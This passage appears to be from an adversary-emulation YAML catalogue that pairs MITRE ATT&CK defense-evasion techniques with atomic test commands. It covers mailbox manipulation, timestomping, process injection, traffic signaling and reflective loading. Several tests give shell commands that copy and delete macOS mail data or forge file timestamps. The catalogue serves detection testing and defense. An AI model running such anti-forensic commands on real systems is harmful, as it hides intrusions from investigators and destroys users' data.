abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Oleg Kolesnikov, Securonix - Nick Carr, Mandiant - David Lu, Tripwire - Felipe Espósito, @Pr0teus - Elastic - Bartosz Jerzman - Menachem Goldstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Containers - ESXi - Linux - macOS - Windows x_mitre_version: '1.8' identifier: T1036 atomic_tests: [] T1070.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--438c967d-3996-4870-bfc2-3954752a1927 created: '2022-07-08T21:04:03.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/008 external_id: T1070.008 - source_name: Volexity SolarWinds description: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. url: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ - source_name: Cybereason Cobalt Kitty 2017 description: Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. url: https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf - source_name: mailx man page description: Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022. url: https://man7.org/linux/man-pages/man1/mailx.1p.html - source_name: ExchangePowerShell Module description: Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022. url: https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes - source_name: Microsoft OAuth Spam 2022 description: Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023. url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T21:56:59.810Z' name: 'Email Collection: Mailbox Manipulation' description: "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Liran Ravich, CardinalOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Office Suite - Windows x_mitre_version: '1.2' identifier: T1070.008 atomic_tests: - name: Copy and Delete Mailbox Data on macOS auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6 description: 'Copies and deletes mail data on macOS ' supported_platforms: - macos executor: command: | mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy rm -rf ~/Library/Mail/copy/* cleanup_command: 'rm -rf ~/Library/Mail/copy ' name: bash elevation_required: true - name: Copy and Modify Mailbox Data on macOS auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665 description: 'Copies and modifies mail data on macOS ' supported_platforms: - macos executor: command: | mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt cleanup_command: 'rm -rf ~/Library/Mail/copy ' name: bash elevation_required: true T1055: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d created: '2017-05-31T21:30:47.843Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055 external_id: T1055 - source_name: GNU Acct description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. url: https://www.gnu.org/software/acct/ - source_name: Elastic Process Injection July 2017 description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - source_name: RHEL auditd description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - source_name: ArtOfMemoryForensics description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.' - source_name: Microsoft Sysmon v6 May 2017 description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. url: https://docs.microsoft.com/sysinternals/downloads/sysmon - source_name: Chokepoint preload rootkits description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017. url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:43.053Z' name: Process Injection description: "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Anastasios Pingios - Christiaan Beek, @ChristiaanBeek - Ryan Becwar x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.4' identifier: T1055 atomic_tests: [] T1205: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1205 external_id: T1205 - source_name: Bleeping Computer - Ryuk WoL description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021. url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ - source_name: AMD Magic Packet description: AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021. url: https://www.amd.com/system/files/TechDocs/20213.pdf - source_name: Mandiant - Synful Knock description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. url: https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ - source_name: Cisco Synful Knock Evolution description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - source_name: Hartrell cd00r 2002 description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.' url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - source_name: GitLab WakeOnLAN description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021. url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:43.225Z' name: Traffic Signaling description: |- Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tony Lee - Josh Day, Gigamon x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Network Devices - Windows x_mitre_version: '2.5' atomic_tests: [] T1218: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--457c7820-d331-465a-915e-42f85500ccc4 created: '2018-04-18T17:59:24.739Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218 external_id: T1218 - source_name: GTFO split description: GTFOBins. (2020, November 13). split. Retrieved April 18, 2022. url: https://gtfobins.github.io/gtfobins/split/ - source_name: LOLBAS Project description: Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022. url: https://github.com/LOLBAS-Project/LOLBAS#criteria - source_name: split man page description: Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022. url: https://man7.org/linux/man-pages/man1/split.1.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:43.406Z' name: Signed Binary Proxy Execution description: |- Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Nishan Maharjan, @loki248 - Hans Christoffer Gaardløs - Praetorian - Wes Hurd x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Linux - macOS x_mitre_version: '3.2' identifier: T1218 atomic_tests: [] T1070.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611 created: '2020-01-31T12:42:44.103Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/006 external_id: T1070.006 - source_name: Juniper Networks ESXi Backdoor 2022 description: Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025. url: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers - source_name: WindowsIR Anti-Forensic Techniques description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.' url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html - source_name: Inversecos Linux Timestomping description: 'inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.' url: https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html - source_name: Inversecos Timestomping 2022 description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping Detection – NTFS Forensics. Retrieved September 30, 2024.' url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html - source_name: Magnet Forensics description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024. url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/ - source_name: Double Timestomping description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024. url: https://x.com/matthewdunwoody/status/1519846657646604289 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:43.937Z' name: 'Indicator Removal on Host: Timestomp' description: |- Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files. In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics) Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022) Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping) In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t ` (which sets access and modification times to a specific value) or `touch -r ` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022) Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Romain Dumont, ESET - Mike Hartley @mikehartley10 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Windows x_mitre_version: '1.2' identifier: T1070.006 atomic_tests: - name: Set a file's access timestamp auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file ' supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-access.txt" dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename} ' executor: command: 'touch -a -t 197001010000.00 #{target_filename} ' cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file ' supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-modification.txt" dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' > #{target_filename} ' executor: command: 'touch -m -t 197001010000.00 #{target_filename} ' cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b description: | Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-creation.txt" executor: elevation_required: true command: | NOW=$(date +%m%d%H%M%Y) date 010100001971 touch #{target_filename} date "$NOW" stat #{target_filename} cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Modify file timestamps using reference file auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 description: | Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - linux - macos input_arguments: target_file_path: description: Path of file to modify timestamps of type: path default: "/tmp/T1070.006-reference.txt" reference_file_path: description: Path of reference file to read timestamps from type: path default: "/bin/sh" executor: command: | touch #{target_file_path} touch -acmr #{reference_file_path} #{target_file_path} cleanup_command: 'rm -f #{target_file_path} ' name: sh - name: MacOS - Timestomp Date Modified auto_generated_guid: 87fffff4-d371-4057-a539-e3b24c37e564 description: 'Stomps on the modification timestamp of a file using MacOS''s SetFile utility ' supported_platforms: - macos input_arguments: target_filename: description: 'Path of file that we are going to stomp on last modified time ' type: path default: "/tmp/T1070.006-modified.txt" target_date: description: Date to replace original timestamps with type: string default: 01/01/1970 dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 MacOS file modified timestomp test'' > #{target_filename} ' executor: name: sh command: 'SetFile -m #{target_date} #{target_filename} ' cleanup_command: 'rm -f #{target_filename} ' T1620: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a created: '2021-10-05T01:15:06.293Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1620 external_id: T1620 - source_name: 00sec Droppers description: 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. url: https://0x00sec.org/t/super-stealthy-droppers/3715 - source_name: S1 Custom Shellcode Tool description: Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021. url: https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/ - source_name: Mandiant BYOL description: Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. url: https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique - source_name: S1 Old Rat New Tricks description: Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. url: https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ - source_name: MDSec Detecting DOTNET description: MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. url: https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ - source_name: Microsoft AssemblyLoad description: Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024. url: https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load - source_name: Intezer ACBackdoor description: 'Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.' url: https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/ - source_name: Stuart ELF Memory description: Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. url: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html - source_name: Introducing Donut description: The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. url: https://thewover.github.io/Introducing-Donut/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:44.030Z' name: Reflective Code Loading description: |- Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - João Paulo de A. Filho, @Hug1nN__ - Shlomi Salem, SentinelOne - Lior Ribak, SentinelOne - Rex Guo, @Xiaofei_REX, Confluera - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics - Jiraput Thamsongkrah x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.3' identifier: T1620 atomic_tests: [] T1480.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742 created: '2024-09-19T14:00:03.401Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1480/002 external_id: T1480.002 - source_name: Intezer RedXOR 2021 description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved September 19, 2024. url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/ - source_name: Sans Mutexes 2012 description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024. url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/ - source_name: ICS Mutexes 2015 description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names to Evade Detection. Retrieved September 19, 2024. url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/ - source_name: Microsoft Mutexes description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19, 2024. url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes - source_name: Deep Instinct BPFDoor 2023 description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September 19, 2024. url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:50:39.088Z' name: Mutual Exclusion description: |- Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes) While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012) In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023) Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Manikantan Srinivasan, NEC Corporation India - Pooja Natarajan, NEC Corporation India - Nagahama Hiroki – NEC Corporation Japan x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1564.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b created: '2023-08-24T17:23:34.470Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/011 external_id: T1564.011 - source_name: Linux Signal Man description: Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023. url: https://man7.org/linux/man-pages/man7/signal.7.html - source_name: nohup Linux Man description: Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023. url: https://linux.die.net/man/1/nohup - source_name: Microsoft PowerShell SilentlyContinue description: Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023. url: https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:41:11.807Z' name: Ignore Process Interrupts description: "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) \ These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion 